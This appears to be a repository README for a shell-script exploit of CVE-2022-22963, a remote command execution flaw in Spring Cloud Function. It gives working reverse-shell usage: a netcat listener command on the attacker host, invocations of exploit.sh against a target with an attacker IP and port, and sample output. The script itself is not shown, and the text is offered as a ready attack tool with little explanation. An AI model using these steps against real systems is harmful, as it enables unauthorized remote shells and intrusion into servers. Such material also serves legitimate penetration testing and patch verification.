/RCE-in-Spring-Cloud-CVE-2022-22963

Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function

Primary LanguageShell

Exploit for RCE in Spring Cloud (CVE 2022-22963)

Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function

See for details about the vulnerability here and here

PoC

Run the netcat on your host:

$ nc -lvnp 9001

Run the exploit (example) with default port 9001 on attacker host:

$ ./exploit.sh site.com 10.10.14.122
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:9001
[*] Done

Run the exploit (example) with the specified port 1337 on attacker host:

$ ./exploit.sh site.com 10.10.14.122 1337
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:1337
[*] Done